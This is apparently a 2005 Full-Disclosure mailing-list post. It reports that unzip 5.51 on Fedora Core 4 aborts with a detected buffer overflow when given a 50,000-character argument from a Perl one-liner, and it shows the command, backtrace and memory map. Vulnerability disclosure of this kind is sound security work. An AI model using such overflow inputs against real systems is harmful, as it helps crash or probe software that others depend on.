Date: Mon Dec 19 17:13:15 2005
From: bob.dehnhardt at trinet.com (Bob Dehnhardt)
Subject: Unzip *ALL* verisons ;))

[bobd@ ~]$ unzip -v|head -1
UnZip 5.51 of 22 May 2004, by Info-ZIP.  Maintained by C. Spieler.  Send

[bobd@ ~]$ uname -a
Linux 2.6.14-1.1644_FC4 #1 Sun Nov 27 03:25:11 EST 2005 i686 i686 i386 GNU/Linux

[bobd@ ~]$ unzip `perl -e 'print "A" x 50000'`
*** buffer overflow detected ***: unzip terminated
======= Backtrace: =========
/lib/libc.so.6(__chk_fail+0x41)[0xac5c45]
/lib/libc.so.6(__strcpy_chk+0x3f)[0xac52d7]
unzip[0x805c1da]
unzip[0x8056734]
unzip[0x804a75a]
/lib/libc.so.6(__libc_start_main+0xdf)[0x9fcd5f]
unzip[0x80491b1]
======= Memory map: ========
0027e000-00287000 r-xp 00000000 16:06 617610     /lib/libgcc_s-4.0.2-20051126.so.1
00287000-00288000 rwxp 00009000 16:06 617610     /lib/libgcc_s-4.0.2-20051126.so.1
00971000-00972000 r-xp 00971000 00:00 0          [vdso]
009ca000-009e4000 r-xp 00000000 16:06 618035     /lib/ld-2.3.5.so
009e4000-009e5000 r-xp 00019000 16:06 618035     /lib/ld-2.3.5.so
009e5000-009e6000 rwxp 0001a000 16:06 618035     /lib/ld-2.3.5.so
009e8000-00b0b000 r-xp 00000000 16:06 618037     /lib/libc-2.3.5.so
00b0b000-00b0d000 r-xp 00123000 16:06 618037     /lib/libc-2.3.5.so
00b0d000-00b0f000 rwxp 00125000 16:06 618037     /lib/libc-2.3.5.so
00b0f000-00b11000 rwxp 00b0f000 00:00 0
08047000-08064000 r-xp 00000000 16:06 853429     /usr/bin/unzip
08064000-08065000 rw-p 0001c000 16:06 853429     /usr/bin/unzip
08065000-08077000 rw-p 08065000 00:00 0
090b1000-090d4000 rw-p 090b1000 00:00 0          [heap]
b7fab000-b7fac000 rw-p b7fab000 00:00 0
b7fc6000-b7fc7000 rw-p b7fc6000 00:00 0
bffa5000-bffc7000 rw-p bffa5000 00:00 0          [stack]
Aborted

 - Bob

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051219/33b3d0f3/attachment.html

Powered by blists - more mailing lists